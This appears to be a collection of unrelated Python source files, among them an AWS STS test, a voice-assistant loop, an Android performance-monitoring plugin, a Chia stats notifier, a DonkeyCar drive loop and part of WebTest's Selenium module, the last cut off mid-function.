'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'web_identity_token_file = %s\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n' % token_file
)
self.write_config(config)
session = Session(profile='A')
with SessionHTTPStubber(session) as stubber:
self.add_assume_role_with_web_identity_http_response(stubber)
# Make an arbitrary client and API call as we are really only
# looking to make sure the STS assume role call uses the correct
# endpoint.
self.make_stubbed_client_call_to_region(
session, stubber, 'us-west-2')
self.assertEqual(
stubber.requests[0].url,
'https://sts.us-west-2.amazonaws.com/'
)
|
main.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import logging
from threading import Thread, Event
from respeaker import Microphone, Player, pixel_ring
from olaf import Bot, Speech
from olaf.config import Logger
logger = logging.getLogger('olaf-voice.main')
def task(quit_event):
mic = Microphone(quit_event=quit_event)
player = Player(mic.pyaudio_instance)
pixel_ring.set_color(rgb=0x505000)
time.sleep(3)
speech = Speech()
myBot = Bot()
while not quit_event.is_set():
if mic.wakeup(keyword='olaf'):
pixel_ring.listen()
data = mic.listen()
pixel_ring.wait()
text = speech.recognize(data)
if text:
logger.debug('Recognized : %s', text)
result = myBot.request(text)
pixel_ring.speak(4, 0)
audio = speech.synthetize(result)
if audio is not None:
player.play_raw(audio)
pixel_ring.off()
mic.close()
pixel_ring.off()
def main():
Logger()
logger.info("Starting application")
quit_event = Event()
thread = Thread(target=task, args=(quit_event,))
thread.start()
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
logger.info("KeyboardInterrupt = Quit")
quit_event.set()
break
thread.join()
if __name__ == '__main__':
main() |
__init__.py | # coding: utf-8
#
from __future__ import absolute_import, print_function
import threading
import re
import time
import datetime
import csv
import sys
import atexit
from collections import namedtuple
_MEM_PATTERN = re.compile(r'TOTAL[:\s]+(\d+)')
# acct_tag_hex is a socket tag
# cnt_set==0 are for background data
# cnt_set==1 are for foreground data
_NetStats = namedtuple(
"NetStats",
"""idx iface acct_tag_hex uid_tag_int cnt_set rx_bytes rx_packets
tx_bytes tx_packets rx_tcp_bytes rx_tcp_packets rx_udp_bytes rx_udp_packets rx_other_bytes rx_other_packets
tx_tcp_bytes tx_tcp_packets tx_udp_bytes tx_udp_packets tx_other_bytes tx_other_packets"""
.split())
class Perf(object):
def __init__(self, d, package_name=None):
self.d = d
self.package_name = package_name
self.csv_output = "perf.csv"
self.debug = False
self.interval = 1.0
self._th = None
self._event = threading.Event()
self._condition = threading.Condition()
self._data = {}
def shell(self, *args, **kwargs):
# print("Shell:", args)
return self.d.shell(*args, **kwargs)
def memory(self):
""" PSS(KB) """
output = self.shell(['dumpsys', 'meminfo', self.package_name]).output
m = _MEM_PATTERN.search(output)
if m:
return int(m.group(1))
return 0
def _cpu_rawdata_collect(self, pid):
"""
pjiff may be 0 if /proc/<pid>/stat does not exist
"""
first_line = self.shell(['cat', '/proc/stat']).output.splitlines()[0]
assert first_line.startswith('cpu ')
# ds: user, nice, system, idle, iowait, irq, softirq, stealstolen, guest, guest_nice
ds = list(map(int, first_line.split()[1:]))
total_cpu = sum(ds)
idle = ds[3]
proc_stat = self.shell(['cat',
'/proc/%d/stat' % pid]).output.split(') ')
pjiff = 0
if len(proc_stat) > 1:
proc_values = proc_stat[1].split()
utime = int(proc_values[11])
stime = int(proc_values[12])
pjiff = utime + stime
return (total_cpu, idle, pjiff)
def cpu(self, pid):
""" CPU
Refs:
- http://man7.org/linux/man-pages/man5/proc.5.html
- [Summary of CPU usage statistics methods for Android performance testing](https://www.jianshu.com/p/6bf564f7cdf0)
"""
store_key = 'cpu-%d' % pid
# first time jiffies, t: total, p: process
if store_key in self._data:
tjiff1, idle1, pjiff1 = self._data[store_key]
else:
tjiff1, idle1, pjiff1 = self._cpu_rawdata_collect(pid)
time.sleep(.3)
# second time jiffies
self._data[
store_key] = tjiff2, idle2, pjiff2 = self._cpu_rawdata_collect(pid)
# calculate
pcpu = 0.0
if pjiff1 > 0 and pjiff2 > 0:
pcpu = 100.0 * (pjiff2 - pjiff1) / (tjiff2 - tjiff1) # process cpu
scpu = 100.0 * ((tjiff2 - idle2) -
(tjiff1 - idle1)) / (tjiff2 - tjiff1) # system cpu
assert scpu > -1 # may be slightly negative (e.g. -0.5) due to sampling jitter
scpu = max(0, scpu)
return round(pcpu, 1), round(scpu, 1)
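# Worked example (added for illustration): if the process jiffies go
# from 100 to 130 while the total CPU jiffies go from 10000 to 10400,
# then pcpu = 100.0 * (130 - 100) / (10400 - 10000) = 7.5 (% CPU)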
def netstat(self, pid):
"""
Returns:
(rall, tall, rtcp, ttcp, rudp, tudp)
"""
m = re.search(r'^Uid:\s+(\d+)',
self.shell(['cat', '/proc/%d/status' % pid]).output,
re.M)
if not m:
return [0] * 6
uid = m.group(1)
lines = self.shell(['cat',
'/proc/net/xt_qtaguid/stats']).output.splitlines()
traffic = [0] * 6
def plus_array(arr, *args):
for i, v in enumerate(args):
arr[i] = arr[i] + int(v)
for line in lines:
vs = line.split()
if len(vs) != 21:
continue
v = _NetStats(*vs)
if v.uid_tag_int != uid:
continue
if v.iface != 'wlan0':
continue
# all, tcp, udp
plus_array(traffic, v.rx_bytes, v.tx_bytes, v.rx_tcp_bytes,
v.tx_tcp_bytes, v.rx_udp_bytes, v.tx_udp_bytes)
store_key = 'netstat-%s' % uid
result = []
if store_key in self._data:
last_traffic = self._data[store_key]
for i in range(len(traffic)):
result.append(traffic[i] - last_traffic[i])
self._data[store_key] = traffic
return result or [0] * 6
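# Usage sketch (illustrative, assuming `perf` is a Perf instance):
# each call returns byte deltas since the previous call, so sampling
# once per interval yields per-interval traffic:
#   rall, tall, rtcp, ttcp, rudp, tudp = perf.netstat(pid)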
def _current_view(self, app=None):
d = self.d
views = self.shell(['dumpsys', 'SurfaceFlinger',
'--list']).output.splitlines()
if not app:
app = d.current_app()
current = app['package'] + "/" + app['activity']
surface_curr = 'SurfaceView - ' + current
if surface_curr in views:
return surface_curr
return current
def _dump_surfaceflinger(self, view):
valid_lines = []
MAX_N = 9223372036854775807
for line in self.shell(
['dumpsys', 'SurfaceFlinger', '--latency',
view]).output.splitlines():
fields = line.split()
if len(fields) != 3:
continue
a, b, c = map(int, fields)
if a == 0:
continue
if MAX_N in (a, b, c):
continue
valid_lines.append((a, b, c))
return valid_lines
def _fps_init(self):
view = self._current_view()
self.shell(["dumpsys", "SurfaceFlinger", "--latency-clear", view])
self._data['fps-start-time'] = time.time()
self._data['fps-last-vsync'] = None
self._data['fps-inited'] = True
def fps(self, app=None):
"""
Return float
"""
if 'fps-inited' not in self._data:
self._fps_init()
view = self._current_view(app)
values = self._dump_surfaceflinger(view)
last_vsync = self._data.get('fps-last-vsync')
last_start = self._data.get('fps-start-time')
try:
idx = values.index(last_vsync)
values = values[idx + 1:]
except ValueError:
pass
duration = time.time() - last_start
if len(values):
self._data['fps-last-vsync'] = values[-1]
self._data['fps-start-time'] = time.time()
return round(len(values) / duration, 1)
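# Note (added for clarity): fps() counts the new frame timestamps
# reported by `dumpsys SurfaceFlinger --latency` since the previous
# call and divides by elapsed wall-clock time, e.g. 57 new frames
# over 0.95s -> 60.0 fps.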
def collect(self):
pid = self.d._pidof_app(self.package_name)
if pid is None:
return
app = self.d.current_app()
pss = self.memory()
cpu, scpu = self.cpu(pid)
rbytes, tbytes, rtcp, ttcp = self.netstat(pid)[:4]
fps = self.fps(app)
timestr = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]
return {
'time': timestr,
'package': app['package'],
'pss': round(pss / 1024.0, 2), # MB
'cpu': cpu,
'systemCpu': scpu,
'rxBytes': rbytes,
'txBytes': tbytes,
'rxTcpBytes': rtcp,
'txTcpBytes': ttcp,
'fps': fps,
}
def continue_collect(self, f):
try:
headers = [
'time', 'package', 'pss', 'cpu', 'systemCpu', 'rxBytes',
'txBytes', 'rxTcpBytes', 'txTcpBytes', 'fps'
]
fcsv = csv.writer(f)
fcsv.writerow(headers)
update_time = time.time()
while not self._event.is_set():
perfdata = self.collect()
if self.debug:
print("DEBUG:", perfdata)
if not perfdata:
print("perf package is not alive:", self.package_name)
time.sleep(1)
continue
fcsv.writerow([perfdata[k] for k in headers])
wait_seconds = max(0,
self.interval - (time.time() - update_time))
time.sleep(wait_seconds)
update_time = time.time()
f.close()
finally:
self._condition.acquire()
self._th = None
self._condition.notify()
self._condition.release()
def start(self):
if sys.version_info.major < 3:
f = open(self.csv_output, "wb")
else:
f = open(self.csv_output, "w", newline='\n')
def defer_close():
if not f.closed:
f.close()
atexit.register(defer_close)
if self._th:
raise RuntimeError("perf is already running")
if not self.package_name:
raise EnvironmentError("package_name need to be set")
self._data.clear()
self._event = threading.Event()
self._condition = threading.Condition()
self._th = threading.Thread(target=self.continue_collect, args=(f, ))
self._th.daemon = True
self._th.start()
def stop(self):
self._event.set()
self._condition.acquire()
self._condition.wait(timeout=2)
self._condition.release()
if self.debug:
print("DEBUG: perf collect stopped")
def csv2images(self, src=None, target_dir='.'):
"""
Args:
src: csv file, default to perf record csv path
target_dir: images store dir
"""
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import datetime
import os
import humanize
src = src or self.csv_output
if not os.path.exists(target_dir):
os.makedirs(target_dir)
data = pd.read_csv(src)
data['time'] = data['time'].apply(
lambda x: datetime.datetime.strptime(x, "%Y-%m-%d %H:%M:%S.%f"))
timestr = time.strftime("%Y-%m-%d %H:%M")
# network
rx_str = humanize.naturalsize(data['rxBytes'].sum(), gnu=True)
tx_str = humanize.naturalsize(data['txBytes'].sum(), gnu=True)
plt.subplot(2, 1, 1)
plt.plot(data['time'], data['rxBytes'] / 1024, label='all')
plt.plot(data['time'], data['rxTcpBytes'] / 1024, 'r--', label='tcp')
plt.legend()
plt.title(
'\n'.join(
["Network", timestr,
'Recv %s, Send %s' % (rx_str, tx_str)]),
loc='left')
plt.gca().xaxis.set_major_formatter(ticker.NullFormatter())
plt.ylabel('Recv(KB)')
plt.ylim(ymin=0)
plt.subplot(2, 1, 2)
plt.plot(data['time'], data['txBytes'] / 1024, label='all')
plt.plot(data['time'], data['txTcpBytes'] / 1024, 'r--', label='tcp')
plt.legend()
plt.xlabel('Time')
plt.ylabel('Send(KB)')
plt.ylim(ymin=0)
plt.savefig(os.path.join(target_dir, "net.png"))
plt.clf()
plt.subplot(3, 1, 1)
plt.title(
'\n'.join(['Summary', timestr, self.package_name]), loc='left')
plt.plot(data['time'], data['pss'], '-')
plt.ylabel('PSS(MB)')
plt.gca().xaxis.set_major_formatter(ticker.NullFormatter())
plt.subplot(3, 1, 2)
plt.plot(data['time'], data['cpu'], '-')
plt.ylim(0, max(100, data['cpu'].max()))
plt.ylabel('CPU')
plt.gca().xaxis.set_major_formatter(ticker.NullFormatter())
plt.subplot(3, 1, 3)
plt.plot(data['time'], data['fps'], '-')
plt.ylabel('FPS')
plt.ylim(0, 60)
plt.xlabel('Time')
plt.savefig(os.path.join(target_dir, "summary.png"))
if __name__ == '__main__':
import uiautomator2 as u2
pkgname = "com.tencent.tmgp.sgame"
# pkgname = "com.netease.cloudmusic"
u2.plugin_register('perf', Perf, pkgname)
d = u2.connect("10.242.62.224")
print(d.current_app())
# print(d.ext_perf.netstat(5350))
# d.app_start(pkgname)
d.ext_perf.start()
d.ext_perf.debug = True
try:
time.sleep(500)
except KeyboardInterrupt:
d.ext_perf.stop()
d.ext_perf.csv2images()
print("threading stopped") |
stats_manager.py | # std
import logging
from datetime import datetime, timedelta
from typing import List
from threading import Thread
from time import sleep
# project
from . import HarvesterActivityConsumer, WalletAddedCoinConsumer, FinishedSignageConsumer
from .stat_accumulators.eligible_plots_stats import EligiblePlotsStats
from .stat_accumulators.wallet_added_coin_stats import WalletAddedCoinStats
from .stat_accumulators.search_time_stats import SearchTimeStats
from .stat_accumulators.signage_point_stats import SignagePointStats
from .stat_accumulators.found_proof_stats import FoundProofStats
from .stat_accumulators.number_plots_stats import NumberPlotsStats
from src.chia_log.parsers.wallet_added_coin_parser import WalletAddedCoinMessage
from src.chia_log.parsers.harvester_activity_parser import HarvesterActivityMessage
from src.chia_log.parsers.finished_signage_point_parser import FinishedSignagePointMessage
from src.notifier.notify_manager import NotifyManager
from src.notifier import Event, EventType, EventPriority, EventService
class StatsManager:
"""Manage all stat accumulators and trigger daily notification to the user
with a summary from all stats that have been collected for the past 24 hours.
"""
def __init__(self, config: dict, notify_manager: NotifyManager):
self._enable = config.get("enable", False)
self._time_of_day = config.get("time_of_day", 21)
self._frequency_hours = config.get("frequency_hours", 24)
if not self._enable:
logging.warning("Disabled stats and daily notifications")
return
logging.info("Enabled stats for daily notifications")
self._notify_manager = notify_manager
self._stat_accumulators = [
WalletAddedCoinStats(),
FoundProofStats(),
SearchTimeStats(),
NumberPlotsStats(),
EligiblePlotsStats(),
SignagePointStats(),
]
logging.info(
f"Summary notifications will be sent out every {self._frequency_hours} "
f"hours starting from {self._time_of_day} o'clock"
)
self._datetime_next_summary = datetime.now().replace(hour=self._time_of_day, minute=0, second=0, microsecond=0)
while datetime.now() > self._datetime_next_summary:
self._datetime_next_summary += timedelta(hours=self._frequency_hours)
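# Example (added for illustration): with time_of_day=21 and
# frequency_hours=24, starting the manager at 22:30 schedules the
# first summary for 21:00 the following day.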
# Start thread
self._is_running = True
self._thread = Thread(target=self._run_loop)
self._thread.start()
def consume_wallet_messages(self, objects: List[WalletAddedCoinMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, WalletAddedCoinConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_harvester_messages(self, objects: List[HarvesterActivityMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, HarvesterActivityConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_signage_point_messages(self, objects: List[FinishedSignagePointMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, FinishedSignageConsumer):
for obj in objects:
stat_acc.consume(obj)
def _send_daily_notification(self):
summary = f"Hello farmer! 👋 Here's what happened in the last {self._frequency_hours} hours:\n"
for stat_acc in self._stat_accumulators:
summary += "\n" + stat_acc.get_summary()
stat_acc.reset()
self._notify_manager.process_events(
[Event(type=EventType.DAILY_STATS, priority=EventPriority.LOW, service=EventService.DAILY, message=summary)]
)
def _run_loop(self):
while self._is_running:
if datetime.now() > self._datetime_next_summary:
self._send_daily_notification()
self._datetime_next_summary += timedelta(hours=self._frequency_hours)
sleep(1)
def stop(self):
self._is_running = False
|
vehicle.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 25 10:44:24 2017
@author: wroscoe
"""
import time
import numpy as np
from threading import Thread
from .memory import Memory
from prettytable import PrettyTable
import traceback
class PartProfiler:
def __init__(self):
self.records = {}
def profile_part(self, p):
self.records[p] = { "times" : [] }
def on_part_start(self, p):
self.records[p]['times'].append(time.time())
def on_part_finished(self, p):
now = time.time()
prev = self.records[p]['times'][-1]
delta = now - prev
thresh = 0.000001
if delta < thresh or delta > 100000.0:
delta = thresh
self.records[p]['times'][-1] = delta
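# Note (added for clarity): on_part_start() appends a wall-clock
# start time and on_part_finished() overwrites that same entry with
# the elapsed duration, so records[p]['times'] ends up holding
# per-invocation durations.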
def report(self):
print("Part Profile Summary: (times in ms)")
pt = PrettyTable()
field_names = ["part", "max", "min", "avg"]
pctile = [50, 90, 99, 99.9]
pt.field_names = field_names + [str(p) + '%' for p in pctile]
for p, val in self.records.items():
# remove the first and last entries because there could be
# one-off time spent in initialisation, and the latest diff
# could be incomplete because of a user keyboard interrupt
arr = val['times'][1:-1]
if len(arr) == 0:
continue
row = [p.__class__.__name__,
"%.2f" % (max(arr) * 1000),
"%.2f" % (min(arr) * 1000),
"%.2f" % (sum(arr) / len(arr) * 1000)]
row += ["%.2f" % (np.percentile(arr, p) * 1000) for p in pctile]
pt.add_row(row)
print(pt)
class Vehicle:
def __init__(self, mem=None):
if not mem:
mem = Memory()
self.mem = mem
self.parts = []
self.on = True
self.threads = []
self.profiler = PartProfiler()
def add(self, part, inputs=[], outputs=[],
threaded=False, run_condition=None):
"""
Method to add a part to the vehicle drive loop.
Parameters
----------
part: class
donkey vehicle part has run() attribute
inputs : list
Channel names to get from memory.
outputs : list
Channel names to save to memory.
threaded : boolean
If a part should be run in a separate thread.
run_condition : str
Name of a memory channel whose boolean value decides whether the part runs.
"""
assert type(inputs) is list, "inputs is not a list: %r" % inputs
assert type(outputs) is list, "outputs is not a list: %r" % outputs
assert type(threaded) is bool, "threaded is not a boolean: %r" % threaded
p = part
print('Adding part {}.'.format(p.__class__.__name__))
entry = {}
entry['part'] = p
entry['inputs'] = inputs
entry['outputs'] = outputs
entry['run_condition'] = run_condition
if threaded:
t = Thread(target=part.update, args=())
t.daemon = True
entry['thread'] = t
self.parts.append(entry)
self.profiler.profile_part(part)
# We start the UWB reading part here to check that it works; if it is not working properly, it has to be re-added.
if p.__class__.__name__ == 'UWBClass':
t.start()
def remove(self, part):
"""
remove part from the parts list
"""
self.parts.remove(part)
def start(self, rate_hz=10, max_loop_count=None, verbose=False):
"""
Start vehicle's main drive loop.
This is the main thread of the vehicle. It starts all the new
threads for the threaded parts then starts an infinite loop
that runs each part and updates the memory.
Parameters
----------
rate_hz : int
The max frequency that the drive loop should run. The actual
frequency may be less than this if there are many blocking parts.
max_loop_count : int
Maximum number of loops the drive loop should execute. This is
used for testing that all the parts of the vehicle work.
verbose: bool
If debug output should be printed into shell
"""
try:
self.on = True
for entry in self.parts:
if entry.get('thread'):
# start the update thread if not UWB (already started when adding it)
if entry.get('part').__class__.__name__ != 'UWBClass':
entry.get('thread').start()
# wait until the parts warm up.
print('Starting vehicle at {} Hz'.format(rate_hz))
loop_count = 0
while self.on:
start_time = time.time()
loop_count += 1
self.update_parts()
# stop drive loop if loop_count exceeds max_loop_count
if max_loop_count and loop_count > max_loop_count:
self.on = False
sleep_time = 1.0 / rate_hz - (time.time() - start_time)
if sleep_time > 0.0:
time.sleep(sleep_time)
else:
# print a message when could not maintain loop rate.
if verbose:
print('WARN::Vehicle: jitter violation in vehicle loop '
'with {0:4.0f}ms'.format(abs(1000 * sleep_time)))
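# Worked example (added for illustration): at rate_hz=10 an
# iteration taking 30ms sleeps 1.0/10 - 0.03 = 0.07s; one taking
# 120ms produces a negative sleep_time and triggers the jitter
# warning above instead.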
if verbose and loop_count % 200 == 0:
self.profiler.report()
except KeyboardInterrupt:
pass
except Exception as e:
traceback.print_exc()
finally:
self.stop()
def update_parts(self):
'''
loop over all parts
'''
for entry in self.parts:
run = True
# check run condition, if it exists
if entry.get('run_condition'):
run_condition = entry.get('run_condition')
run = self.mem.get([run_condition])[0]
if run:
# get part
p = entry['part']
# start timing part run
self.profiler.on_part_start(p)
# get inputs from memory
inputs = self.mem.get(entry['inputs'])
# run the part
if entry.get('thread'):
outputs = p.run_threaded(*inputs)
else:
outputs = p.run(*inputs)
# save the output to memory
if outputs is not None:
self.mem.put(entry['outputs'], outputs)
# finish timing part run
self.profiler.on_part_finished(p)
def stop(self):
print('Shutting down vehicle and its parts...')
for entry in self.parts:
try:
entry['part'].shutdown()
except AttributeError:
# usually from missing shutdown method, which should be optional
pass
except Exception as e:
print(e)
self.profiler.report()
|
sel.py | # (c) 2005 Ian Bicking and contributors; written for Paste
# (http://pythonpaste.org)
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
"""
Routines for testing WSGI applications with selenium.
Most interesting is :class:`~webtest.sel.SeleniumApp` and the
:func:`~webtest.sel.selenium` decorator
"""
import os
import cgi
import sys
import time
import signal
import socket
import types
import webob
import logging
import warnings
import tempfile
import unittest
import threading
import subprocess
from functools import wraps
from webtest import app as testapp
from wsgiref import simple_server
from contextlib import contextmanager
from webtest.compat import PY3
from webtest.compat import urlencode
from webtest.compat import binary_type
from webtest.compat import HTTPConnection
from webtest.compat import CannotSendRequest
from webtest.compat import HTTPServer
from webtest.compat import SimpleHTTPRequestHandler
try:
import json
except ImportError:
try:
import simplejson as json # NOQA
except ImportError:
json = False
try:
unicode()
except NameError:
unicode = str
log = logging.getLogger(__name__)
if 'SELENIUM_VERBOSE' in os.environ:
log.addHandler(logging.StreamHandler(sys.stderr))
log.setLevel(logging.DEBUG)
class SeleniumWarning(Warning):
"""Specific warning category"""
HAS_UPLOAD_SUPPORT = ('*chrome', '*firefox')
############
# Decorator
############
def function_decorator(func):
"""run test with selenium. create a new session if needed"""
@wraps(func)
def wrapper(*args):
if is_available():
if args and isinstance(args[0], unittest.TestCase):
self = args[0]
if isinstance(self.app, SeleniumApp):
func(self)
else:
old_app = self.app
self.app = SeleniumApp(self.app.app)
try:
func(self)
finally:
self.app.close()
self.app = old_app
else:
# function
func(*args)
return wrapper
def context_manager(resp):
"""A context mamanger to create a session inside a test"""
resp.updated = False
if not is_available():
yield None
else:
test_app = resp.test_app
app = SeleniumApp(test_app.app)
for h, v in resp.request.headers.items():
if h.lower() not in ('host',):
app.browser.addCustomRequestHeader(h, v)
fd = tempfile.NamedTemporaryFile(prefix='webtest-selenium-',
suffix='.html')
fd.write(resp.body)
fd.flush()
response = app.get('/__file__', dict(__file__=fd.name))
try:
yield response
finally:
body = app.browser.getHtmlSource()
if PY3:
body = body.encode(resp.charset or 'utf-8')
resp.body = body
resp._forms_indexed = None
resp.updated = True
app.close()
fd.close()
def selenium(obj):
"""A callable usable as:
- class decorator
- function decorator
- contextmanager
"""
if isinstance(obj, type):
if is_available():
return obj
elif isinstance(obj, types.FunctionType):
return function_decorator(obj)
elif isinstance(obj, testapp.TestResponse):
return contextmanager(context_manager)(obj)
else:
raise RuntimeError('Unsupported type %r' % obj)
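# Usage sketch (illustrative, names are hypothetical):
#
#   @selenium
#   def test_index(self):
#       resp = self.app.get('/')
#
#   with selenium(resp) as sresp:
#       sresp.doc.myid.click()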
class Selenium(object):
"""Selenium RC control aka ``browser``
An object used to manipulate DOM nodes. This object allows you to
use the underlying selenium api. See the Selenium `api
<http://goo.gl/IecEk>`_
You can use the original method name::
browser.fireEvent('id=#myid", 'focus')
Or a more pythonic name::
browser.fire_event('id=#myid", 'focus')
Both are equal to::
browser.execute('fireEvent', 'id=#myid', 'focus')
"""
def __init__(self):
self.host = os.environ.get('SELENIUM_HOST', '127.0.0.1')
self.port = int(os.environ.get('SELENIUM_PORT', 4444))
self.session_id = None
def start(self, url):
self.driver = os.environ.get('SELENIUM_DRIVER',
'*googlechrome')
self.session_id = self.getNewBrowserSession(
self.driver, url, '',
"captureNetworkTraffic=true",
"addCustomRequestHeader=true")
def stop(self):
self.testComplete()
self.session_id = None
def execute(self, cmd, *args):
data = dict([(i + 1, a) for i, a in enumerate(args)], cmd=cmd)
if self.session_id:
data['sessionId'] = self.session_id
data = urlencode(data)
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=utf-8"
}
conn = HTTPConnection(self.host, self.port)
try:
conn.request("POST", "/selenium-server/driver/", data, headers)
resp = conn.getresponse()
data = resp.read()
finally:
conn.close()
if PY3:
data = str(data, 'utf-8')
if data.startswith('ERROR: Unknown command:'):
raise AttributeError(repr(data))
elif not data.startswith('OK'):
raise RuntimeError(repr(data))
data = data[3:]
if data in ('true', 'false'):
return data == 'true'
return data
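# Illustrative example of the wire protocol (added for clarity): a
# call like execute('open', '/') POSTs cmd=open&1=%2F&sessionId=<id>
# to /selenium-server/driver/ and expects a body starting with "OK".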
def __getattr__(self, attr):
cmd = _get_command(attr)
def wrapped(*args):
args = [cmd] + [str(a) for a in args]
return self.execute(*args)
wrapped.__name__ = attr
return wrapped
##############
# Webtest API
##############
class SeleniumApp(testapp.TestApp):
"""See :class:`webtest.TestApp`
SeleniumApp only supports ``GET`` requests
"""
apps = []
def __init__(self, app=None, url=None, timeout=30000,
extra_environ=None, relative_to=None, **kwargs):
self.app = None
if app:
super(SeleniumApp, self).__init__(app, relative_to=relative_to)
self._run_server(self.app)
url = self.app.url
assert is_available()
self.session_id = None
self._browser = Selenium()
self._browser.start(url)
self.extra_environ = extra_environ or {}
self.timeout = timeout
self.test_app = self
@property
def browser(self):
"""The current :class:`~webtest.sel.Selenium`"""
return self._browser
@property
def has_upload_support(self):
return self._browser.driver in HAS_UPLOAD_SUPPORT
def do_request(self, req, status, expect_errors):
if req.method != 'GET':
raise testapp.AppError('Only GET requests are allowed')
if self.app:
req.host = '%s:%s' % self.app.bind
self.browser.captureNetworkTraffic('json')
for h, v in req.headers.items():
if h.lower() not in ('host',):
self.browser.addCustomRequestHeader(h, v)
self.browser.open(req.url)
resp = self._get_response()
if not expect_errors:
self._check_status(status, resp)
if not status:
status = resp.status_int
if not (status > 300 and status < 400):
self._check_errors(resp)
return resp
def _get_response(self, resp=None, timeout=None):
"""Get responses responses from selenium"""
if timeout != 0:
timeout = timeout or self.timeout
self.browser.waitForPageToLoad(timeout)
traffic = json.loads(self.browser.captureNetworkTraffic('json'))
responses = []
errors = []
for d in traffic:
if d['url'].endswith('.ico'):
continue
req = webob.Request.blank(d['url'])
for h in d['requestHeaders']:
req.headers[h['name']] = h['value']
resp = TestResponse()
resp.app = resp.test_app = self.test_app
resp.browser = self.test_app.browser
resp.responses = responses
resp.errors = errors
resp.request = req
resp.status = str(d['statusCode'])
for h in d['responseHeaders']:
resp.headers[h['name']] = h['value']
if resp.status_int == 200 and 'text/' in resp.content_type:
if not resp.charset:
resp.charset = 'utf-8'
if resp.status_int > 400:
errors.append('%s %r' % (resp.request.url, resp))
if 'html' in resp.content_type or resp.status_int != 200:
responses.append(resp)
if responses:
resp = responses.pop(0)
return resp
elif resp is not None:
return resp
else:
raise LookupError('No response found')
def _run_server(self, app):
"""Run a wsgi server in a separate thread"""
ip, port = _free_port()
self.app = app = WSGIApplication(app, (ip, port))
def run():
httpd = simple_server.make_server(
ip, port, app,
server_class=WSGIServer,
handler_class=WSGIRequestHandler)
httpd.serve_forever()
app.thread = threading.Thread(target=run)
app.thread.start()
conn = HTTPConnection(ip, port)
time.sleep(.5)
for i in range(100):
try:
conn.request('GET', '/__application__')
conn.getresponse()
except (socket.error, CannotSendRequest):
time.sleep(.3)
else:
break
def close(self):
"""Close selenium and the WSGI server if needed"""
if self.app:
conn = HTTPConnection(*self.app.bind)
for i in range(100):
try:
conn.request('GET', '/__kill_application__')
conn.getresponse()
except socket.error:
conn.close()
break
else:
time.sleep(.3)
if 'SELENIUM_KEEP_OPEN' not in os.environ:
self.browser.stop()
if 'SELENIUM_PID' in os.environ:
os.kill(int(os.environ['SELENIUM_PID']), signal.SIGTERM)
class TestResponse(testapp.TestResponse):
def follow(self, status=None, **kw):
"""If this request is a redirect, follow that redirect. It
is an error if this is not a redirect response. Returns
another response object.
"""
if not (self.status_int >= 300 and self.status_int < 400):
raise ValueError(
'You can only follow redirect (3xx) responses. Not %s' % self.status_int)
if len(self.responses):
resp = self.responses[0]
if not kw.get('expect_errors', False):
self.app._check_status(status, resp)
if not status:
self.app._check_errors(resp)
return self.responses.pop(0)
raise LookupError('Responses queue is empty. Nothing to follow.')
def click(self, description=None, linkid=None, href=None,
anchor=None, index=None, verbose=False,
extra_environ=None, timeout=None):
link = self.doc.link(description=description, linkid=linkid,
href=href, index=index)
link.click()
if timeout == 0:
return self
return self.test_app._get_response(resp=self, timeout=timeout)
@property
def forms(self):
return Forms(self)
@property
def form(self):
return Form(self, 0)
def _body__get(self):
body = self.browser.getHtmlSource()
if PY3:
return body.encode(self.charset or 'utf-8')
if isinstance(body, binary_type):
return unicode(body, self.charset or 'utf-8')
else:
return body
body = property(_body__get)
def __contains__(self, item):
if isinstance(item, Element):
return item.isElementPresent()
return super(TestResponse, self).__contains__(item)
@property
def doc(self):
"""Expose a :class:`~webtest.browser.Document`"""
return Document(self)
##########
# DOM
##########
class Element(object):
"""A object use to manipulate DOM nodes. This object allow to use the
underlying selenium api for the specified locator. See Selenium `api
<http://goo.gl/IecEk>`_
You can use the original method name::
element.fireEvent('focus')
Or a more pythonic name::
element.fire_event('focus')
Both are equal to::
browser.execute('fireEvent', element.locator, 'focus')
"""
def __init__(self, resp, locator):
self.browser = resp.browser
self.resp = resp
self.locator = locator
def __getattr__(self, attr):
cmd = _get_command(attr)
def wrapped(*args):
args = [cmd, self.locator] + [str(a) for a in args]
return self.browser.execute(*args)
wrapped.__name__ = attr
return wrapped
def exist(self):
"""return true is the element is present"""
return self.isElementPresent()
def wait(self, timeout=3000):
"""Wait for an element and return this element"""
script = "selenium.isElementPresent(%r) || null" % str(self)
try:
self.browser.waitForCondition(script, timeout)
except RuntimeError:
raise RuntimeError("Can't find %s after %sms" % (self, timeout))
return self
def wait_and_click(self, timeout=3000):
"""Wait for an element, click on it and return this element"""
return self.wait().click()
def hasClass(self, name):
"""True iif the class is present"""
classes = self.attr('class').split()
return name in classes
def html(self):
"""Return the innerHTML of the element"""
return self.eval('e.innerHTML')
def text(self):
"""Return the text of the element"""
return self.getText()
def attr(self, attr):
"""Return the attribute value of the element"""
return self.eval('e.getAttribute(%r)' % str(attr))
def drag_and_drop(self, element):
"""Drag and drop to element"""
return self.dragAndDropToObject(element)
def value__get(self):
return self.getValue()
def value__set(self, value):
value = _get_value(value)
script = """(function() {
s.doFireEvent(l, "focus");
s.doType(l, %s);
e.setAttribute("value", %s);
s.doFireEvent(l, "keydown");
s.doFireEvent(l, "keypress");
s.doFireEvent(l, "keyup");
}())""" % (value, value)
self.eval(script)
value = property(value__get, value__set)
def eval(self, *expr):
"""Eval a javascript expression in Selenium RC. You can use the
following variables:
- s: the ``selenium`` object
- b: the ``browserbot`` object
- l: the element locator string
- e: the element itself
"""
script = (
"(function(s) {"
"var l = %r;"
"var b = s.browserbot; var e = b.findElement(l);"
"var res = %s; return res || 'null';"
"}(this))"
